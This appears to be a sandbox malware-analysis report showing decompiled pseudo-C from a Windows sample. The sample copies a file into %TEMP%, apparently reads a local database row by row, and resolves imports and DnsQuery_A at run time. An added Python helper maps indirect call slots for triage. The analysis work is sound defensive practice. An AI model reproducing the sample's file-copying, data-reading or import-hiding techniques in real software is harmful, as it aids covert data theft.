                            									_push( *((intOrPtr*)(_v20 + 0x14 + _t174 * 8)));
                            									_push( &_v68);
                            									_push(_v16);
                            									if(_v8() == 0) {
                            										E0040370C( &_v28,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x14 + _t174 * 8)) + 0x10)));
                            										E0040370C( &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x18 + _t174 * 8)) + 0x10)));
                            										E0040370C( &_v36,  *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x1c)) + 0x10)));
                            										if(E00403790(_v28) != 0 && E00403790(_v36) != 0) {
                            											_t163 =  *0x41b1c0; // 0x41ca10
                            											E0040525C(0x40c100, _t139, _v28,  *_t163, _t169, _t174, 0x40c0f4, _v36, _v32);
                            										}
                            									}
                            									_t139 = _t139 + 1;
                            									_t169 = _t169 - 1;
                            								} while (_t169 != 0);
                            							}
                            						}
                            					}
                            				}
                            				_pop(_t149);
                            				 *[fs:eax] = _t149;
                            				_push(E0040C0E5);
                            				E00403BF4( &_v76, 2);
                            				E00403508( &_v36, 3);
                            				_t152 =  *0x40be90; // 0x40be94
                            				return E00404280( &_v24, 2, _t152);
                            			}

                            Address range of the listing above: 0x0040bec7 to 0x0040c0dd (per-line address column omitted)

                            APIs
                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040C0DE,?,00000000,?,00000000), ref: 0040BF04
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF0A
                            • LoadLibraryA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040BF5C
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF79
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF8E
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BFA3
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID:
                            • API String ID: 2238633743-0
                            • Opcode ID: 6cba6da2323dd7d907e0dc00df1589a9f8d861ecf83175a0ac18562ac8fc467f
                            • Instruction ID: 0e090bdfc3d65a5bca4157f74653ebb500d09f599f80782c5ae309756f7fedfb
                            • Opcode Fuzzy Hash: 6cba6da2323dd7d907e0dc00df1589a9f8d861ecf83175a0ac18562ac8fc467f
                            • Instruction Fuzzy Hash: A661A9B5A00209DFDB00EFA5C881A9EB7BDFF49304B50457AE914F7391D638ED458BA8
                            Uniqueness

                            Uniqueness Score: -1.00%
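                            E0040BEBC above resolves its imports at run time: LoadLibraryA and GetProcAddress are called on names read from globals (0x41c9f0, 0x41c9f4, 0x41c9f8 and so on through E00403990), and the other listings on this page then call through globals such as 0x41b1dc, whose stored value (0x41ca30) is itself a pointer to the function. Only the statically imported calls reach the report's APIs blocks, so triage of such output starts by listing every slot, how often it is called and with how many arguments, so each can be labelled once. The script below is added as an example and is not part of the report or of the sample; it parses lines copied from the listings above (a constructed excerpt, not a whole function) and separates slots used as call targets from slots whose contents are passed as data, such as 0x41b390, which is handed to the string helper E00403990.

```python
import re
from collections import defaultdict

# A handful of lines copied from the decompiled listings in this report.
# The input is constructed for the example (it is not a complete function).
LISTING = r"""
_t98 =  *0x41b140; // 0x41ca20
_t100 =  *((intOrPtr*)( *_t98))(E00403990(_v36),  &_v16);
_t134 =  *0x41b390; // 0x41c934
_t138 =  *0x41b2d4; // 0x41ca28
_t140 =  *((intOrPtr*)( *_t138))(_v16, E00403990( *_t134), 0xffffffff,  &_v20,  &_v24);
_t142 =  *0x41b384; // 0x41ca2c
_t144 =  *((intOrPtr*)( *_t142))(_v20);
_t157 =  *0x41b1dc; // 0x41ca30
E00403CF4( &_v80,  *((intOrPtr*)( *_t157))(_v20, 0, 0x4115ec, _v76, _v28));
_t163 =  *0x41b1dc; // 0x41ca30
E00403CF4( &_v84,  *((intOrPtr*)( *_t163))(_v20, 1, 0x4115ec, _v80));
_t102 =  *0x41b46c; // 0x41ca38
 *((intOrPtr*)( *_t102))(_v20);
_t106 =  *0x41b20c; // 0x41ca24
 *((intOrPtr*)( *_t106))(_v16);
"""

# "_tN = *0xSLOT; // 0xCELL": the global SLOT holds the address CELL.
LOAD = re.compile(r"(_t\d+)\s*=\s*\*0x([0-9a-fA-F]+);\s*//\s*0x([0-9a-fA-F]+)")
# "*((intOrPtr*)( *_tN))(" : a call through the pointer stored at CELL.
CALL_TARGET = re.compile(r"\*\(\(intOrPtr\*\)\(\s*\*(_t\d+)\)\)\(")


def split_args(text, open_idx):
    """Split the arguments of the call whose '(' is at text[open_idx],
    honouring nested parentheses such as E00403990(_v36)."""
    depth, start, args = 0, open_idx + 1, []
    for i in range(open_idx, len(text)):
        ch = text[i]
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                tail = text[start:i].strip()
                if tail:
                    args.append(tail)
                return args
        elif ch == "," and depth == 1:
            args.append(text[start:i].strip())
            start = i + 1
    raise ValueError("unbalanced parentheses in: " + text)


def map_indirect_calls(listing):
    """Return {slot: {"cell": int, "calls": [(line, argc)], "data_uses": int}}."""
    slot_of = {}   # decompiler temporary -> global slot it was loaded from
    table = defaultdict(lambda: {"cell": None, "calls": [], "data_uses": 0})
    for lineno, line in enumerate(listing.splitlines(), 1):
        for m in LOAD.finditer(line):
            temp, slot, cell = m.group(1), int(m.group(2), 16), int(m.group(3), 16)
            slot_of[temp] = slot
            table[slot]["cell"] = cell
        called = defaultdict(int)
        for m in CALL_TARGET.finditer(line):
            temp = m.group(1)
            if temp in slot_of:
                argc = len(split_args(line, m.end() - 1))
                table[slot_of[temp]]["calls"].append((lineno, argc))
                called[temp] += 1
        # Dereferences of a loaded temporary that are not call targets are
        # data uses: that slot holds something other than a function pointer.
        for temp, slot in slot_of.items():
            derefs = len(re.findall(r"\*\s*" + temp + r"\b", line))
            if derefs > called[temp]:
                table[slot]["data_uses"] += derefs - called[temp]
    return dict(table)


def function_slots(table):
    """Slots only ever used as call targets, as (slot, cell, sorted arities)."""
    return sorted((slot, info["cell"], sorted({n for _, n in info["calls"]}))
                  for slot, info in table.items()
                  if info["calls"] and not info["data_uses"])


def arity_conflicts(table):
    """Slots called with differing argument counts: either a variadic target
    or the decompiler attached leftover stack values to the call."""
    return sorted(slot for slot, info in table.items()
                  if len({n for _, n in info["calls"]}) > 1)


if __name__ == "__main__":
    table = map_indirect_calls(LISTING)
    for slot, cell, arities in function_slots(table):
        print(f"slot 0x{slot:x} -> cell 0x{cell:x}, arities {arities}")
    print("arity conflicts:", [hex(s) for s in arity_conflicts(table)])
```

                            The output is a labelling worksheet, not an identification: the call count and arity narrow what each cell can point to, and the conflicting arities on 0x41b1dc (5 and 4 arguments in the excerpt) are the usual sign that the decompiler folded stale stack values into a call, so the real prototype should be confirmed from the disassembly or from the resolved name once the string globals are decrypted.
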

                            C-Code - Quality: 72%
                            			E00401934() {
                            				void* _t2;
                            				void* _t3;
                            				void* _t14;
                            				intOrPtr* _t19;
                            				intOrPtr _t23;
                            				intOrPtr _t26;
                            				intOrPtr _t28;
                            
                            				_t26 = _t28;
                            				if( *0x41c5ac == 0) {
                            					return _t2;
                            				} else {
                            					_push(_t26);
                            					_push(E00401A0A);
                            					_push( *[fs:edx]);
                            					 *[fs:edx] = _t28;
                            					if( *0x41c035 != 0) {
                            						_push(0x41c5b4);
                            						L004011CC();
                            					}
                            					 *0x41c5ac = 0;
                            					_t3 =  *0x41c60c; // 0x0
                            					LocalFree(_t3);
                            					 *0x41c60c = 0;
                            					_t19 =  *0x41c5d4; // 0x41c5d4
                            					while(_t19 != 0x41c5d4) {
                            						_t1 = _t19 + 8; // 0x0
                            						VirtualFree( *_t1, 0, 0x8000);
                            						_t19 =  *_t19;
                            					}
                            					E00401234(0x41c5d4);
                            					E00401234(0x41c5e4);
                            					E00401234(0x41c610);
                            					_t14 =  *0x41c5cc; // 0x0
                            					while(_t14 != 0) {
                            						 *0x41c5cc =  *_t14;
                            						LocalFree(_t14);
                            						_t14 =  *0x41c5cc; // 0x0
                            					}
                            					_pop(_t23);
                            					 *[fs:eax] = _t23;
                            					_push(0x401a11);
                            					if( *0x41c035 != 0) {
                            						_push(0x41c5b4);
                            						L004011D4();
                            					}
                            					_push(0x41c5b4);
                            					L004011DC();
                            					return 0;
                            				}
                            			}

                            Address range of the listing above: 0x00401935 to 0x00401a09 (per-line address column omitted)

                            APIs
                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                            • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
                            • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
                            • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                            • String ID:
                            • API String ID: 3782394904-0
                            • Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                            • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                            • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                            • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E00410D88(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				intOrPtr _v56;
                            				char _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				WCHAR* _t74;
                            				intOrPtr* _t89;
                            				void* _t91;
                            				intOrPtr* _t93;
                            				intOrPtr* _t97;
                            				intOrPtr* _t125;
                            				intOrPtr* _t129;
                            				void* _t131;
                            				intOrPtr* _t133;
                            				void* _t135;
                            				intOrPtr* _t137;
                            				intOrPtr* _t143;
                            				void* _t145;
                            				void* _t151;
                            				intOrPtr _t171;
                            				intOrPtr _t173;
                            				intOrPtr _t179;
                            				intOrPtr _t183;
                            				intOrPtr _t184;
                            				void* _t185;
                            				void* _t186;
                            
                            				_t181 = __esi;
                            				_t150 = __ebx;
                            				_t183 = _t184;
                            				_t151 = 9;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t151 = _t151 - 1;
                            					_t188 = _t151;
                            				} while (_t151 != 0);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				_push(_t183);
                            				_push(0x410fe1);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t184;
                            				E004034E4( &_v28);
                            				_push(_t183);
                            				_push(0x410f66);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t184;
                            				E0040709C(GetTickCount(), __ebx,  &_v48, __esi, _t188);
                            				_push(_v48);
                            				E00406FDC( &_v52, __ebx, __edi, __esi, _t188);
                            				_push(_v52);
                            				_push(L".tmp");
                            				E00403E78();
                            				E004078D8(_v8, _t150,  &_v40, _t188);
                            				E004062FC(L"%TEMP%",  &_v60, _t188);
                            				_push(_v60);
                            				_push(0x411018);
                            				_push(_v32);
                            				E00403E78();
                            				E004078D8(_v56, _t150,  &_v44, _t188);
                            				_t74 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t74, 0xffffffff);
                            				E0040377C( &_v64, _v44);
                            				E00404B58(_v64, _t150, _t151,  &_v36, _t181, _t188);
                            				E00403D88( &_v68, _v36);
                            				if(E0040776C(_v68, _t150, _t151) != 0) {
                            					_t89 =  *0x41b140; // 0x41ca20
                            					_t91 =  *((intOrPtr*)( *_t89))(E00403990(_v36),  &_v16);
                            					_t185 = _t184 + 8;
                            					__eflags = _t91;
                            					if(_t91 == 0) {
                            						_t125 =  *0x41b1b8; // 0x41c814
                            						_t129 =  *0x41b2d4; // 0x41ca28
                            						_t131 =  *((intOrPtr*)( *_t129))(_v16, E00403990( *_t125), 0xffffffff,  &_v20,  &_v24);
                            						_t186 = _t185 + 0x14;
                            						__eflags = _t131;
                            						if(_t131 == 0) {
                            							while(1) {
                            								_t133 =  *0x41b384; // 0x41ca2c
                            								_t135 =  *((intOrPtr*)( *_t133))(_v20);
                            								__eflags = _t135 - 0x64;
                            								if(_t135 != 0x64) {
                            									goto L9;
                            								}
                            								_t137 =  *0x41b1dc; // 0x41ca30
                            								E004036DC( &_v72,  *((intOrPtr*)( *_t137))(_v20, 0, _v28));
                            								_t143 =  *0x41b1dc; // 0x41ca30
                            								_t145 =  *((intOrPtr*)( *_t143))(_v20, 1, 0x411024, _v72);
                            								_t186 = _t186 + 0x10;
                            								E004036DC( &_v76, _t145);
                            								_push(_v76);
                            								_push(E00411030);
                            								E00403850();
                            							}
                            						}
                            					}
                            					L9:
                            					_t93 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t93))(_v20);
                            					_t97 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t97))(_v16);
                            					_pop(_t171);
                            					 *[fs:eax] = _t171;
                            					E00403D88(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t179);
                            					 *[fs:eax] = _t179;
                            				}
                            				_pop(_t173);
                            				 *[fs:eax] = _t173;
                            				_push(E00410FE8);
                            				E00403508( &_v76, 2);
                            				E00403BDC( &_v68);
                            				E004034E4( &_v64);
                            				E00403BF4( &_v60, 6);
                            				E004034E4( &_v36);
                            				E00403BDC( &_v32);
                            				E004034E4( &_v28);
                            				return E00403BDC( &_v8);
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 00410DCC
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                            • DeleteFileW.KERNEL32(00000000), ref: 00410F84
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: File$CopyCountDeleteTick
                            • String ID: %TEMP%$.tmp
                            • API String ID: 2381671008-3650661790
                            • Opcode ID: f1ba787bab243d8ae0bf332dfc3548e60595c157863896d08201a00fab91904c
                            • Instruction ID: ee23a472d3747a439df3c4e0a114333c5db2ab7a39ff8a49f746a70128ed8489
                            • Opcode Fuzzy Hash: f1ba787bab243d8ae0bf332dfc3548e60595c157863896d08201a00fab91904c
                            • Instruction Fuzzy Hash: F0611A71A00109AFCB10EF95DC42ADEBBB8EF48315F504476F514F32A1DB79AE468B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 44%
                            			E00411034(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				char _v40;
                            				char _v44;
                            				char _v48;
                            				char _v52;
                            				intOrPtr _v56;
                            				char _v60;
                            				char _v64;
                            				char _v68;
                            				char _v72;
                            				char _v76;
                            				WCHAR* _t72;
                            				intOrPtr* _t87;
                            				void* _t89;
                            				intOrPtr* _t91;
                            				intOrPtr* _t95;
                            				intOrPtr* _t119;
                            				intOrPtr* _t123;
                            				void* _t125;
                            				intOrPtr* _t127;
                            				void* _t129;
                            				intOrPtr* _t131;
                            				intOrPtr* _t137;
                            				void* _t139;
                            				void* _t145;
                            				intOrPtr _t165;
                            				intOrPtr _t167;
                            				intOrPtr _t174;
                            				intOrPtr _t178;
                            				intOrPtr _t179;
                            				void* _t180;
                            				void* _t181;
                            
                            				_t176 = __esi;
                            				_t144 = __ebx;
                            				_t178 = _t179;
                            				_t145 = 9;
                            				do {
                            					_push(0);
                            					_push(0);
                            					_t145 = _t145 - 1;
                            					_t183 = _t145;
                            				} while (_t145 != 0);
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				E00404150( &_v8);
                            				_push(_t178);
                            				_push(0x411282);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t179;
                            				E00403BDC( &_v28);
                            				_push(_t178);
                            				_push(0x411212);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t179;
                            				E0040709C(GetTickCount(), __ebx,  &_v48, __esi, _t183);
                            				_push(_v48);
                            				E00406FDC( &_v52, __ebx, __edi, __esi, _t183);
                            				_push(_v52);
                            				_push(L".tmp");
                            				E00403E78();
                            				E004078D8(_v8, _t144,  &_v40, _t183);
                            				E004062FC(L"%TEMP%",  &_v60, _t183);
                            				_push(_v60);
                            				_push(E004112B8);
                            				_push(_v32);
                            				E00403E78();
                            				E004078D8(_v56, _t144,  &_v44, _t183);
                            				_t72 = E00403D98(_v44);
                            				CopyFileW(E00403D98(_v40), _t72, 0xffffffff);
                            				E0040377C( &_v64, _v44);
                            				E00404B58(_v64, _t144, _t145,  &_v36, _t176, _t183);
                            				E00403D88( &_v68, _v36);
                            				if(E0040776C(_v68, _t144, _t145) != 0) {
                            					_t87 =  *0x41b140; // 0x41ca20
                            					_t89 =  *((intOrPtr*)( *_t87))(E00403990(_v36),  &_v16);
                            					_t180 = _t179 + 8;
                            					__eflags = _t89;
                            					if(_t89 == 0) {
                            						_t119 =  *0x41b330; // 0x41c930
                            						_t123 =  *0x41b2d4; // 0x41ca28
                            						_t125 =  *((intOrPtr*)( *_t123))(_v16, E00403990( *_t119), 0xffffffff,  &_v20,  &_v24);
                            						_t181 = _t180 + 0x14;
                            						__eflags = _t125;
                            						if(_t125 == 0) {
                            							while(1) {
                            								_t127 =  *0x41b384; // 0x41ca2c
                            								_t129 =  *((intOrPtr*)( *_t127))(_v20);
                            								__eflags = _t129 - 0x64;
                            								if(_t129 != 0x64) {
                            									goto L9;
                            								}
                            								_t131 =  *0x41b1dc; // 0x41ca30
                            								E00403CF4( &_v72,  *((intOrPtr*)( *_t131))(_v20, 0, _v28));
                            								_t137 =  *0x41b1dc; // 0x41ca30
                            								_t139 =  *((intOrPtr*)( *_t137))(_v20, 1, E004112C0, _v72);
                            								_t181 = _t181 + 0x10;
                            								E00403CF4( &_v76, _t139);
                            								_push(_v76);
                            								_push(E004112C8);
                            								E00403E78();
                            							}
                            						}
                            					}
                            					L9:
                            					_t91 =  *0x41b46c; // 0x41ca38
                            					 *((intOrPtr*)( *_t91))(_v20);
                            					_t95 =  *0x41b20c; // 0x41ca24
                            					 *((intOrPtr*)( *_t95))(_v16);
                            					_pop(_t165);
                            					 *[fs:eax] = _t165;
                            					E00403C18(_v12, _v28);
                            					DeleteFileW(E00403D98(_v44));
                            				} else {
                            					_pop(_t174);
                            					 *[fs:eax] = _t174;
                            				}
                            				_pop(_t167);
                            				 *[fs:eax] = _t167;
                            				_push(E00411289);
                            				E00403BF4( &_v76, 3);
                            				E004034E4( &_v64);
                            				E00403BF4( &_v60, 6);
                            				E004034E4( &_v36);
                            				E00403BF4( &_v32, 2);
                            				return E00403BDC( &_v8);
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 00411078
                            • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                            • DeleteFileW.KERNEL32(00000000), ref: 00411230
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: File$CopyCountDeleteTick
                            • String ID: %TEMP%$.tmp
                            • API String ID: 2381671008-3650661790
                            • Opcode ID: 6c813f6f30e52c69c11b13ca0db13bc07111c03d37e724bc6cd42c504f57e7ca
                            • Instruction ID: b158b585ad64a0e2cffbc60e29a794732e4ff4356334f001507f487ecad874f7
                            • Opcode Fuzzy Hash: 6c813f6f30e52c69c11b13ca0db13bc07111c03d37e724bc6cd42c504f57e7ca
                            • Instruction Fuzzy Hash: E4611975A00109AFDB00EB95DC82ADEBBF8EF49314F504076F514F32A1DA38AE458B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 41%
                            			E00417574(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				intOrPtr _v117;
                            				void* _t16;
                            				intOrPtr* _t37;
                            				intOrPtr _t41;
                            				intOrPtr* _t46;
                            				void* _t49;
                            
                            				_t16 = __eax +  *__eax;
                            				 *_t16 =  *_t16 + _t16;
                            				 *[cs:eax] =  *[cs:eax] + _t16;
                            				_v117 = _v117 + __edx;
                            				_v12 = __edx;
                            				_v8 = _t16;
                            				_t5 =  &_v8; // 0x41777a
                            				E00403980( *_t5);
                            				_push(_t49);
                            				_push(0x41761e);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t49 + 0xfffffff4;
                            				_t46 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
                            				if(_t46 != 0) {
                            					_v16 = 0;
                            					_t37 = E00402530(0x30);
                            					_v16 = E00402530(0x48);
                            					 *_t37 = 1;
                            					 *((intOrPtr*)(_t37 + 4)) = _v12;
                            					_push(0);
                            					_push( &_v16);
                            					_push(_t37);
                            					_push(0);
                            					_push(1);
                            					_t11 =  &_v8; // 0x41777a
                            					_push(E00403990( *_t11));
                            					if( *_t46() == 0) {
                            					}
                            				}
                            				_pop(_t41);
                            				 *[fs:eax] = _t41;
                            				_push(E00417625);
                            				_t14 =  &_v8; // 0x41777a
                            				return E004034E4(_t14);
                            			}

                            APIs
                            • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
                            • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: DnsQuery_A$dnsapi.dll$zwA
                            • API String ID: 2574300362-2265345817
                            • Opcode ID: 6bdd3902560739d62fc79d690f3d0dcbf2d231b852dc5b86d52374d4dc3b239c
                            • Instruction ID: a7d4bf9b2760dea35b02269f2c10af10878945f0623a8129c970236146844d6a
                            • Opcode Fuzzy Hash: 6bdd3902560739d62fc79d690f3d0dcbf2d231b852dc5b86d52374d4dc3b239c
                            • Instruction Fuzzy Hash: C2119070904604AED711DBA9CD52B9EBBF8DF49714F5140B7F804E72D2D6789E018B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 38%
                            			E00417578(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				intOrPtr _v117;
                            				intOrPtr* _t36;
                            				intOrPtr _t40;
                            				intOrPtr* _t45;
                            				void* _t48;
                            
                            				 *[cs:eax] =  *[cs:eax] + __eax;
                            				_v117 = _v117 + __edx;
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				_t5 =  &_v8; // 0x41777a
                            				E00403980( *_t5);
                            				_push(_t48);
                            				_push(0x41761e);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t48 + 0xfffffff4;
                            				_t45 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
                            				if(_t45 != 0) {
                            					_v16 = 0;
                            					_t36 = E00402530(0x30);
                            					_v16 = E00402530(0x48);
                            					 *_t36 = 1;
                            					 *((intOrPtr*)(_t36 + 4)) = _v12;
                            					_push(0);
                            					_push( &_v16);
                            					_push(_t36);
                            					_push(0);
                            					_push(1);
                            					_t11 =  &_v8; // 0x41777a
                            					_push(E00403990( *_t11));
                            					if( *_t45() == 0) {
                            					}
                            				}
                            				_pop(_t40);
                            				 *[fs:eax] = _t40;
                            				_push(E00417625);
                            				_t14 =  &_v8; // 0x41777a
                            				return E004034E4(_t14);
                            			}

                            APIs
                            • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
                            • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: DnsQuery_A$dnsapi.dll$zwA
                            • API String ID: 2574300362-2265345817
                            • Opcode ID: 683611451f48912ee67de96a3f18f76482e6faee4b38531112f7dff33efa9d13
                            • Instruction ID: ea46895599b20c27feb42da0d668784e66eeb00bbfd17c159799839ff483915a
                            • Opcode Fuzzy Hash: 683611451f48912ee67de96a3f18f76482e6faee4b38531112f7dff33efa9d13
                            • Instruction Fuzzy Hash: 7111C470904604BED711DFA9CD42B8EBBF8DB45714F5140B7F804E72C1D6789E008B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 35%
                            			E0041757C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                            				char _v8;
                            				intOrPtr _v12;
                            				char _v16;
                            				intOrPtr* _t34;
                            				intOrPtr _t38;
                            				intOrPtr* _t43;
                            				void* _t46;
                            
                            				_v12 = __edx;
                            				_v8 = __eax;
                            				_t3 =  &_v8; // 0x41777a
                            				E00403980( *_t3);
                            				_push(_t46);
                            				_push(0x41761e);
                            				_push( *[fs:eax]);
                            				 *[fs:eax] = _t46 + 0xfffffff4;
                            				_t43 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
                            				if(_t43 != 0) {
                            					_v16 = 0;
                            					_t34 = E00402530(0x30);
                            					_v16 = E00402530(0x48);
                            					 *_t34 = 1;
                            					 *((intOrPtr*)(_t34 + 4)) = _v12;
                            					_push(0);
                            					_push( &_v16);
                            					_push(_t34);
                            					_push(0);
                            					_push(1);
                            					_t9 =  &_v8; // 0x41777a
                            					_push(E00403990( *_t9));
                            					if( *_t43() == 0) {
                            					}
                            				}
                            				_pop(_t38);
                            				 *[fs:eax] = _t38;
                            				_push(E00417625);
                            				_t12 =  &_v8; // 0x41777a
                            				return E004034E4(_t12);
                            			}

                            Instruction addresses (gutter of the listing above): 0x00417585 - 0x0041761d

                            APIs
                            • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
                            • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: DnsQuery_A$dnsapi.dll$zwA
                            • API String ID: 2574300362-2265345817
                            • Opcode ID: 697d60033c3d33510135cfd8dc7fe3b627bac7424d41906727b856e359fce3ae
                            • Instruction ID: e3f94ad17905d3749a36cc042419755c400cae35a044259d7baf032426d6234e
                            • Opcode Fuzzy Hash: 697d60033c3d33510135cfd8dc7fe3b627bac7424d41906727b856e359fce3ae
                            • Instruction Fuzzy Hash: D01151B1A14608AED711DFAACD42B9EBBF8EB48714F514076F804E72C1E6789E008B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E00402AC4() {
                            				void* _v8;
                            				char _v12;
                            				int _v16;
                            				signed short _t12;
                            				signed short _t14;
                            				intOrPtr _t27;
                            				void* _t29;
                            				void* _t31;
                            				intOrPtr _t32;
                            
                            				_t29 = _t31;
                            				_t32 = _t31 + 0xfffffff4;
                            				_v12 =  *0x41b018 & 0x0000ffff;
                            				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                            					_t12 =  *0x41b018; // 0x1332
                            					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                            					 *0x41b018 = _t14;
                            					return _t14;
                            				} else {
                            					_push(_t29);
                            					_push(E00402B35);
                            					_push( *[fs:eax]);
                            					 *[fs:eax] = _t32;
                            					_v16 = 4;
                            					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                            					_pop(_t27);
                            					 *[fs:eax] = _t27;
                            					_push(0x402b3c);
                            					return RegCloseKey(_v8);
                            				}
                            			}

                            Instruction addresses (gutter of the listing above): 0x00402ac5 - 0x00402b5a

                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
